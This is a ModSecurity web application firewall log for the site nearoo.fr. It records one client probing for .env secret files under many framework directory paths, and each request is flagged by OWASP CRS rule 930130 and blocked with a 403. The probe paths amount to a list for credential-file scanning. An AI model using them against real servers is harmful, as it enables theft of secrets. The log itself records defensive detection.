[Mon May 11 16:54:23.021829 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/symfony/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiMwAAAVI"]
[Mon May 11 16:54:23.235432 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/wordpress/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNAAAAVI"]
[Mon May 11 16:54:23.235647 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/wordpress/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNAAAAVI"]
[Mon May 11 16:54:23.235891 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/wordpress/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNAAAAVI"]
[Mon May 11 16:54:23.355995 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/wp/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNQAAAVI"]
[Mon May 11 16:54:23.356220 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/wp/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNQAAAVI"]
[Mon May 11 16:54:23.356453 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/wp/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNQAAAVI"]
[Mon May 11 16:54:23.506094 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cms/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNgAAAVI"]
[Mon May 11 16:54:23.506326 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cms/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNgAAAVI"]
[Mon May 11 16:54:23.506552 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cms/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiNgAAAVI"]
[Mon May 11 16:54:23.736255 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/drupal/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiOQAAAVI"]
[Mon May 11 16:54:23.736482 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/drupal/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiOQAAAVI"]
[Mon May 11 16:54:23.736761 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/drupal/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiOQAAAVI"]
[Mon May 11 16:54:23.999961 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/joomla/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiOwAAAVI"]
[Mon May 11 16:54:24.000200 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/joomla/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiOwAAAVI"]
[Mon May 11 16:54:24.000464 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/joomla/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiOwAAAVI"]
[Mon May 11 16:54:24.189409 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/magento/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPAAAAVI"]
[Mon May 11 16:54:24.189631 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/magento/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPAAAAVI"]
[Mon May 11 16:54:24.189858 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/magento/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPAAAAVI"]
[Mon May 11 16:54:24.372788 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/shopify/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPQAAAVI"]
[Mon May 11 16:54:24.373010 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/shopify/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPQAAAVI"]
[Mon May 11 16:54:24.373287 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/shopify/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPQAAAVI"]
[Mon May 11 16:54:24.546204 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/prestashop/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPgAAAVI"]
[Mon May 11 16:54:24.546403 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/prestashop/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPgAAAVI"]
[Mon May 11 16:54:24.546627 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/prestashop/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPgAAAVI"]
[Mon May 11 16:54:24.681404 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/codeigniter/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPwAAAVI"]
[Mon May 11 16:54:24.681632 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/codeigniter/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPwAAAVI"]
[Mon May 11 16:54:24.681851 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/codeigniter/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiPwAAAVI"]
[Mon May 11 16:54:24.906490 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cakephp/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiQAAAAVI"]
[Mon May 11 16:54:24.906704 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cakephp/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiQAAAAVI"]
[Mon May 11 16:54:24.906929 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cakephp/.env"] [unique_id "agHtoIW8yzYoWG_eyCWiQAAAAVI"]
[Mon May 11 16:54:25.104696 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/zend/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQQAAAVI"]
[Mon May 11 16:54:25.104923 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/zend/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQQAAAVI"]
[Mon May 11 16:54:25.105179 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/zend/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQQAAAVI"]
[Mon May 11 16:54:25.266117 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/yii/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQgAAAVI"]
[Mon May 11 16:54:25.266363 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/yii/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQgAAAVI"]
[Mon May 11 16:54:25.266606 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/yii/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQgAAAVI"]
[Mon May 11 16:54:25.503021 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/laravel5/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQwAAAVI"]
[Mon May 11 16:54:25.503211 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/laravel5/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQwAAAVI"]
[Mon May 11 16:54:25.503452 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/laravel5/.env"] [unique_id "agHtoYW8yzYoWG_eyCWiQwAAAVI"]
